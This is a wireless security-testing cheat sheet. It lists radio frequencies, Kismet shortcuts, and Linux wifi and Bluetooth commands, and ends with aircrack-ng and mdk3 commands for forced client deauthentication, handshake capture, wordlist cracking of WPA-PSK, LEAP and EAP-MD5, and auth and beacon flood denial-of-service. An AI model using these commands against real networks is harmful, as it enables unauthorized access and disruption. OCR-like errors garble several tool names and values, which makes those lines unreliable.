# Wireless ## wireless #### Frequency chart | Technology | Frequency | | -------------------- | ------------------------------------------------------------------------------ | | RFID |

120-150 kHz (LF)

13.56 MHz (HF)

433 MHz (lJHF)

| | Keyless Entry |

315 MHz (N. Am)

433.92 MHz (Europe, Asia)

| | Cellular (US) |

698-894 MHz

1710-1755 MHz

1850-1910 MHz

2110-2155 MHz

| | GPS | 1227.60,1575.42 MHz | | L Band | 1-2 GHz | | 802.15.4 (ZigBee) |

868 MHz (Europe)

915 MHz (lJS, Australia)

| | 802.15.1 (Bluetooth) | 2.4-2.483.5 GHz | | 802.11 b/g | 2.4 GHz | | 802.11a | 5.0 GHz | | 802.11 n | 2.4/5.0 GHZ | | C Band | 4-8 GHz | | Ku Band | 12-18 GHz | | K Band | 18-26.5 GHz | | Ka Band | 26.5-40 GHz | #### Fcc id lookup ``` https://apps.fcc.gov/oetcf/eas/reports/GenericSearch.cfm ``` #### Database of frequencies ``` http://www.radioreference.com/apps/db/ ``` #### Source of Kismet | **Command** | **Explanation** | | ----------------------------- | ----------------------------------------------------- | | e | kismet servers | | h Help | | | | View full screen | | n Current network number | | | | Remove the sound | | | Network details | | t | tag or remove the network tag | | | Linking network list | | g Grouping of tagged networks | | | | Display the power levels of the wireless network card | | | Remove the group, the current group | | d Show displayable settings | | | c Show current network users | | | | Package rate chart | | L | Lock the channel in the selected channel | | a Show network statistics | | | H | Back to the normal channel | | p | Receive package type | | +/- | Expand/collapse groups | | f Network Center | | | CTRL+L | Display the page again | | w | Tracking alerts | | Q Exit Kismet | | | X Close the popup window | | #### wifi commands in linux | command | Explanation | | ------------------ | ---------------------------- | | iwconfig | Interface settings | | rfkill list | Show wifi problem | | rfkill unblock all | turn on wifi | | airdump-ng mon0 | Monitoring of all interfaces | #### Connected to an insecure network ``` iwconfig ath0 essid $SSID ifconfig ath0 up dhclient ath0 ``` #### connect to wep ``` iwconfig ath0 essid $SSID key ifconfig ath0 up dhclient ath0 ``` #### Connect to wpa-psk ``` iwconfig ath0 essid $SSID ifconfig ath0 up wpa_supplicant -B -i ath0 -c wpa-psk.conf dhclient ath0 ``` #### Connect to wpa-enterprise ``` iwconfig ath0 essid $SSID ifconfig ath0 up wpa supplicant -B -i ath0 -c wpa-ent.conf dhclient ath0 ``` ### Bluetooth on Linux | Command | Description | | -------------------------------------------------------------- | ------------------------------------ | | hciconfig hci0 up | Turn on Bluetooth interface | | hcitool -i hci0 scan --flush --all | Search for Bluetooth enabled devices | | sdptool browse BD\_ADDR | List of open services | |

hciconfig hci0 name "NAME" class Ox520204

pi scan

| Select as discoverable | | pand -K | Delete pand session | ### Testing wifi networks in Linux #### Start monitor mode interface ``` airmon-ng stop ath0 airmon-ng start wifi0 iwconfig ath0 channel $CH ``` #### Capture client handshake attack ``` airdump-ng -c $CH --bssid $AP -w file athO #Capture traffic aireplay-ng -0 10 -a $AP -c $CH athO #Force client de-auth ``` #### Brute force handshake attack ``` aircrack-ng -w wordlist capture.cap # WPA-PSK asleep -r capture.cap -w dict.asleep # LEAP eapmd5pass -r capture.cap -w wordlist # EAP-HDS ``` #### Dos attack ``` mdk3 int a -a $AP #Auth Flood mdk3 int b -c $CH #Beacon Flood ```